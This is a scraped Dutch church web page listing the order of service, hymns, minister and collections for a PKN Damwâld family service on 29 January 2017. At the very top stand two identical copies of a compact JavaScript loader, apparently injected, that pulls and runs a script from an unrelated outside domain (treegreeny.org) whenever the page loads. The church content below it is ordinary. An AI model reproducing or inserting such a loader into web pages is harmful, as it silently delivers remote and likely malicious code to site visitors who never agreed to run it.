;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 januari 2017 9:30 uur - PKN Damwâld
zondag 29 januari 2017
09:30 uur
Kerk-School-Gezinsdienst

Kerkdienst zondag 29 januari 2017 9:30 uur

Thema: Gods helden

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Ivo van Hijum
Thema:Gods helden
Mededeling:Kerk-School-Gezinsdienst
Liturgie
Lied voor de dienst ELB 423: 1, 2, 3 en 4
Welkom en mededelingen
We zingen: ELB 168: 1, 2, 3, 4, 5, 6 en 7
Stil gebed, bemoediging en groet
We zingen: Psalm 84: 3 en 4
Gebed
Het thema “Gods Helden”
- Kinderen naar voren in de kerk. Kring maken.
o Wat hebben de kinderen op school gemaakt? Boekje.
o Wat heb je geleerd over een held?
- Kinderen zingen twee liederen ELB 457: 1, 2, 3 , 4 en Dapper, dapper net als David
Dominee Timmer vertelt het Bijbelverhaal van Salomo.
We zingen: Lied: Wijs en verstandig
Uitleg bij het Bijbelverhaal "Gods helden"
We zingen: Opwekking 698
Dankgebed en voorbeden Onze Vader
Collecte
Slotlied ELB 246: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Leprazending

Leprazending is een internationale Christelijke organisatie tégen lepra, met aandacht en liefde voor de individuele patiënt. Leprazending wil leprapatiënten medisch, sociaal en geestelijk bijstaan. Leprazending streeft ernaar om Gods liefde zichtbaar en tastbaar te maken voor mensen die zich verstoten voelen. Leprazending gaat verder dan medische zorg. Leprazending wil leprapatiënten een nieuw leven bieden, een nieuw geluk. Leprazending doet dat door bijvoorbeeld opleidingen te verzorgen, en microkredieten te verstrekken. Leprazending richt zoveel mogelijk op de behoeften van de individuele patiënten.

Tweede collecte: Kerk
Uitganscollecte: Jeugraad